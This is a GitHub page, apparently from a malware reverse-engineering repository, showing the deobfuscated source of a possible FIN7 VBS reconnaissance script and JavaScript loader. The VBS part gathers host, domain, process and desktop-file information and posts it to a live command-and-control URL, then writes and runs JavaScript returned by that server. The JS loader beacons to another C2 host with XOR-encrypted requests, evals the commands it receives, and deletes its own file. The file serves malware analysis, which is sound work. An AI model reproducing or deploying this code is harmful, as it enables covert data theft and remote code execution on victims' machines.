Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Malware-Misc-RE/2020-04-14-possible-fin7-vbs-ad-js-loader-initial-vk.raw.js /
Jump to
Code definitions
Code navigation index up-to-date

Go to file
  • Go to file
  • Copy path
  • Copy permalink
 
 
Cannot retrieve contributors at this time
256 lines (244 sloc) 11.6 KB
Raw Blame
Open in GitHub Desktop
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///// POSSIBLE FIN7 VBS PART DECODER ACTIVE DIRECTORY SEARCHER /////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
on error resume next: panel_url = "https://domenuscdm.com/info": set objwmiservice = getobject("winmgmts:" & "{impersonationlevel=impersonate}!\\" & "." & "\root\cimv2"): set wshshell = createobject("wscript.shell"): set fs = createobject("scripting.filesystemobject"): appdata_folder = wshshell.expandenvironmentstrings("%appdata%"): username = wshshell.expandenvironmentstrings("%username%"): function send(url, data): if data = ""
then: data = "id=" & get_id() & "&type=get": end
if :set xmlhttp = createobject("msxml2.serverxmlhttp"): xmlhttp.open "post", url, false: xmlhttp.setrequestheader "user-agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:6.0) Gecko/20100101 Firefox/67.0": xmlhttp.setrequestheader "content-type", "application/x-www-form-urlencoded": xmlhttp.send data: send = xmlhttp.responsetext: end
function: function run_js(js): set tf = fs.createtextfile(appdata_folder & "\some.js", true): tf.write(js): tf.close: strcommand = "wscript.exe " & appdata_folder & "\some.js": set objwmiservice = getobject("winmgmts:" & "{impersonationlevel=impersonate}!\\" & "." & "\root\cimv2"): set objprocess = objwmiservice.get("win32_process"): errreturn = objprocess.create(strcommand, null, null, intprocessid): end
function: function get_id(): for each objitem in objwmiservice.execquery("select * from win32_networkadapterconfiguration where ipenabled = true"): macaddress = objitem.macaddress: if typename(macaddress) = "String"
and len(macaddress) > 1 then: id = replace(macaddress, ":", ""): exit
for: end
if :next: get_id = id: end
function: function get_computer_info(mem): set colsettings = objwmiservice.execquery("select * from win32_computersystem"): for each objcomputer in colsettings: hostname = objcomputer.name: domainname = objcomputer.domain: if objcomputer.partofdomain then: domainmember = "yes":
else :domainmember = "no": end
if :next: if mem = ""
then: get_computer_info = "&Hostname=" & hostname & "&DomainMember=" & domainmember & "&DomainName=" & domainname:
else :get_computer_info = domainmember: end
if :end
function: function get_grivers(): set dc = fs.drives: for each drive in dc: drivers = drivers & drive & ";": next: get_grivers = drivers: end
function: function get_processlist(): for each process in getobject("winmgmts:{impersonationlevel=impersonate}").instancesof("win32_process"): processlist = processlist & process.name & "%%%": next: get_processlist = processlist: end
function: function get_desktopfiles(): desktop = wshshell.specialfolders("desktop"): set col = fs.getfolder(desktop).files: count_d = 0: for each c in col: desktopfilelist = desktopfilelist & c & "%%%": next: get_desktopfiles = desktopfilelist: end
function: function count_domain_hosts(): if get_computer_info("mem") = "yes"
then: wshshell.run "powershell.exe $s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://'; $s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher (([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2 } }; $path = $env:appdata + '\results.txt';ac $path $n", 0: appdata_file = appdata_folder & "\results.txt": domainhosts = -3: for i = 1 to 6: if fs.fileexists(appdata_file) then: set file = fs.opentextfile(appdata_file, 1): If Not file.atendofstream Then domainhosts = file.readall end
if :file.close: fs.deletefile appdata_file: exit
for: end
if :wscript.sleep(20000): next: count_domain_hosts = domainhosts:
else :count_domain_hosts = -1: end
if :end
function: data = "id=" & get_id() & "&type=put" & get_computer_info("") & "&DomainHosts=" & count_domain_hosts() & "&UserName=" & username & "&LogicalDrives=" & get_grivers() & "&SystemInfo=nothing&SoftwareInfo=nothing&NetworkInfo=nothing&ProcessList=" & get_processlist() & "&DesktopFileList=" & get_desktopfiles() & "&DesktopScreenshot=nothing&WebHistory=nothing&stype=vbs": response = send(panel_url, data): if response = "ok"
then: js = send(panel_url, ""): run_js(js): end
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///// POSSIBLE FIN7 JS LOADER NEW MAIN & START_DELAY FUNCTION () ///////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
function anonymous() {
///
var nipgigjehdaf = 'string';
var qhuxyzewpu = '&';
var qqimgiwpife = 'Scripting.FileSystemObject';
var kevfezajpi = 'WScript.Shell';
var jiskypfokry = 'winmgmts:root/CIMV2';
var ocbuxhygfezir = '&_&';
var abxejroqowo = 'request';
var dajoxijify = 'POST';
var onambevxiva = '';
var adymajaxbe = '';
var pmidkopihyno = '?type=name';
var hfafsucohdiz = 'encrypt';
var thojkequho = 'Microsoft';
var ujxuxbogrotelq = 'hide';
var lwafvehigvisv = 'decrypt';
var eliqabweql = 'group=vbs&rt=0&secret=hf63FGEjrg28f2&time=120000&uid=';
var habhekxyspudxo = 'delete';
var aroligqanzi = 'decrypt';
var ofidibahte = 'new';
var ixopyzlyk = '&_&';
var yqiqazjecy = 'show';
var ujumajovamw = 'request';
var ymwaqdiqzeqtigv = '_';
var hyqxukkemlanfo = 'no';
var duwmulydi = 'new';
var uzdibikhovfyxf = 'Windows';
var tkymjekarlujf = 'https://environmentales.com/';
var yqbyjrepwyj = 'pictures';
var qlettugibomc = '';
var yfsacuwfymijc = '';
var sircesadvelny = '&id=';
var xvelmonovpumk = 'renew';
var efekufuqa = 'encrypt';
var emgulmommovab = 'page_id=new';
var adsefegezycz = 'img';
var noczojceqki = 'Unknown';
var gurzukqyzxigru = '';
var jlojpefetpu = 'string';
var astovqicygy = 'Content-Type';
var nokikoxuzd = 'application/x-www-form-urlencoded';
var owikvijah = 'User-Agent';
var osycfybvic = 'add';
var kimxogbabfavfu = 'esmykjykago=';
var ozhujyhjuta = 'sync';
var ufyqoqdetab = '';
var ftixxafijtivy = 'info';
var zugykxegotdu = 'no';
var ktynfahexxylw = '?type=content&id=';
var orcyzuluh = 'MSXML2.ServerXMLHTTP';
var epjivehug = 'encrypt';
var qomilure = 'AppData';
var duhjikgydivr = '/';
var ewohkagunecr = 'z';
var iwvihfysih = '_';
var qlakubuqica = 'POST';
var ekvekxytugtath = 'images';
var qoropywlykli = '%APPDATA%';
function id() {
var lrequest = wmi.ExecQuery('select * from Win32_NetworkAdapterConfiguration where ipenabled = true');
var lItems = new Enumerator(lrequest);
for (; !lItems.atEnd(); lItems.moveNext()) {
var mac = lItems.item().macaddress;
var dns_hostname = lItems.item().DNSHostName;
if (function () {
try {
return mac.typeof ? mac.typeof : typeof mac;
} catch (e) {
return typeof mac;
}
}() === jlojpefetpu && mac.length > 1) {
if (function () {
try {
return dns_hostname.typeof ? dns_hostname.typeof : typeof dns_hostname;
} catch (e) {
return typeof dns_hostname;
}
}() !== jlojpefetpu && dns_hostname.length < 1) {
dns_hostname = noczojceqki;
} else {
for (var i = 0; i < dns_hostname.length; i++) {
if (dns_hostname.charAt(i) > ewohkagunecr) {
dns_hostname = dns_hostname.substr(0, i) + ymwaqdiqzeqtigv + dns_hostname.substr(i + 1);
}
}
}
return mac + ymwaqdiqzeqtigv + dns_hostname;
}
}
}
function crypt_controller(type, request) {
var encryption_key = yfsacuwfymijc;
if (type === aroligqanzi) {
request = unescape(request);
var request_split = request.split(ixopyzlyk);
request = request_split[0];
encryption_key = request_split[1].split(yfsacuwfymijc);
} else {
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(yfsacuwfymijc);
request = unescape(encodeURIComponent(request));
}
var output = new Array(request.length);
for (var i = 0; i < request.length; i++) {
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
output[i] = String.fromCharCode(charCode);
}
var result_string = output.join(yfsacuwfymijc);
if (type === efekufuqa) {
result_string = result_string + ixopyzlyk + encryption_key.join(yfsacuwfymijc);
result_string = escape(result_string);
}
return result_string;
}
function get_path() {
var pathes = [
ekvekxytugtath,
yqbyjrepwyj,
adsefegezycz,
ftixxafijtivy,
duwmulydi
];
var files = [
ozhujyhjuta,
yqiqazjecy,
ujxuxbogrotelq,
osycfybvic,
duwmulydi,
xvelmonovpumk,
habhekxyspudxo
];
var path = pathes[Math.floor(Math.random() * pathes.length)] + duhjikgydivr + files[Math.floor(Math.random() * files.length)];
return tkymjekarlujf + path;
}
function send_data(type, data, crypt) {
{
var e;
try {
var http_object = new ActiveXObject(orcyzuluh);
if (type === ujumajovamw) {
http_object.open(qlakubuqica, get_path() + pmidkopihyno, false);
data = kimxogbabfavfu + crypt_controller(efekufuqa, eliqabweql + uniq_id + sircesadvelny + id() + qhuxyzewpu + data);
} else {
http_object.open(qlakubuqica, get_path() + ktynfahexxylw + uniq_id, false);
if (crypt) {
data = crypt_controller(efekufuqa, data);
}
}
http_object.setRequestHeader(owikvijah, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0');
http_object.setRequestHeader(astovqicygy, nokikoxuzd);
http_object.setOption(2, 13056);
http_object.send(data);
return http_object.responseText;
} catch (_e) {
e = _e;
{
return hyqxukkemlanfo;
}
}
}
}
function main() {
var ncommand = yfsacuwfymijc;
ncommand = send_data(ujumajovamw, emgulmommovab, true);
if (ncommand !== hyqxukkemlanfo) {
{
var e;
try {
eval(rewrite(crypt_controller(aroligqanzi, ncommand), true));
} catch (_e) {
e = _e;
{
}
}
}
}
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
WScript.Sleep(random_knock);
main();
}
function start_delay() {
var s = WScript;
s.Sleep(120000);
}
var first = false;
var shell = new ActiveXObject(kevfezajpi); //WScript.Shell
var fso = new ActiveXObject(qqimgiwpife); //Scripting.FileSystemObject
var wmi = GetObject(jiskypfokry); // winmgmts:root/CIMV2
var uniq_id = new Date().getUTCMilliseconds();
var app_path = shell.expandEnvironmentStrings(qoropywlykli); //%APPDATA%
if (fso.GetAbsolutePathName(fso.GetParentFolderName(app_path)).indexOf(qomilure) > 5) { // AppData
if (WScript.ScriptFullName.indexOf(thojkequho + String.fromCharCode(92) + uzdibikhovfyxf) < 0) {
// thojkequho = "Windows"
fso.deleteFile(WScript.ScriptFullName);
}
{
var e;
try {
start_delay();
main();
} catch (_e) {
e = _e;
{
main();
}
}
}
}